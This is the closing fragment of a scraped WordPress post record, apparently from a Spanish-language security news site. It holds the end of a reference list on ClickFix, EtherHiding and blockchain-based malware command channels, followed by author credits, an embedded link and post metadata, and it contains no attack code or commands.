EtherHiding<\/em>\u00a0(UNC5342, dead-drop resolver, oct. 2025).<\/li>\n\n\n\n<li>The DFIR Report \u2014\u00a0<em>EtherRAT \u2192 TukTuk C2 \u2192 The Gentlemen ransomware<\/em>\u00a0(C2 on-chain con desenlace en ransomware, abr. 2026).<\/li>\n\n\n\n<li>BlueVoyant \u2014\u00a0<em>Lorem Ipsum, ClickFix Pivot &amp; Rapid Brigantine<\/em>. Sekoia.io \u2014\u00a0<em>Unveiling ErrTraffic<\/em>\u00a0(ClickFix + EtherHiding MaaS).<\/li>\n\n\n\n<li>Huntress \u2014\u00a0<em>ClickFix Gets Creative: Malware Buried in Images<\/em>. Silent Push \u2014\u00a0<em>Unmasking SocGholish and its operator TA569<\/em>.<\/li>\n\n\n\n<li>MITRE ATT&amp;CK \u2014 matriz empresarial de t\u00e1cticas y t\u00e9cnicas.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Autor: <a href=\"https:\/\/ciber-tec.com.co\/\" data-type=\"link\" data-id=\"https:\/\/ciber-tec.com.co\/\">Nahum Deavila<\/a>. Fuente primaria: Unit 42, Palo Alto Networks.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">FUENTE: <a href=\"https:\/\/ciber-tec.com.co\/\" data-type=\"link\" data-id=\"https:\/\/ciber-tec.com.co\/\">CIBER-TEC<\/a><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed is-provider-ciber-tec-insights wp-block-embed-ciber-tec-insights\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"xU9tY4FS6N\"><a href=\"https:\/\/insights.ciber-tec.com.co\/clickfix-jokerstat-y-c2-en-blockchain-diseccion-de-una-operacion-pre-ransomware-como-servicio\/\">ClickFix, JokerStat y C2 en blockchain: disecci\u00f3n de una operaci\u00f3n pre-ransomware como servicio<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; visibility: hidden;\" title=\"\u201cClickFix, JokerStat y C2 en blockchain: disecci\u00f3n de una operaci\u00f3n pre-ransomware como servicio\u201d \u2014 CIBER-TEC Insights\" src=\"https:\/\/insights.ciber-tec.com.co\/clickfix-jokerstat-y-c2-en-blockchain-diseccion-de-una-operacion-pre-ransomware-como-servicio\/embed\/#?secret=ecZH7QsLnp#?secret=xU9tY4FS6N\" data-secret=\"xU9tY4FS6N\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>CIBER-TEC, En este art\u00edculo analizaremos una campa\u00f1a, documentada por Unit 42, que industrializa la convergencia de tres mundos<\/p>\n","protected":false},"author":1,"featured_media":430,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,1,13,7],"tags":[],"class_list":["post-429","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-amenazasyataques","category-news","category-seguridaddigital","category-vulneravilidades"],"_links":{"self":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/429","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/comments?post=429"}],"version-history":[{"count":1,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/429\/revisions"}],"predecessor-version":[{"id":431,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/429\/revisions\/431"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media\/430"}],"wp:attachment":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media?parent=429"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/categories?post=429"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/tags?post=429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}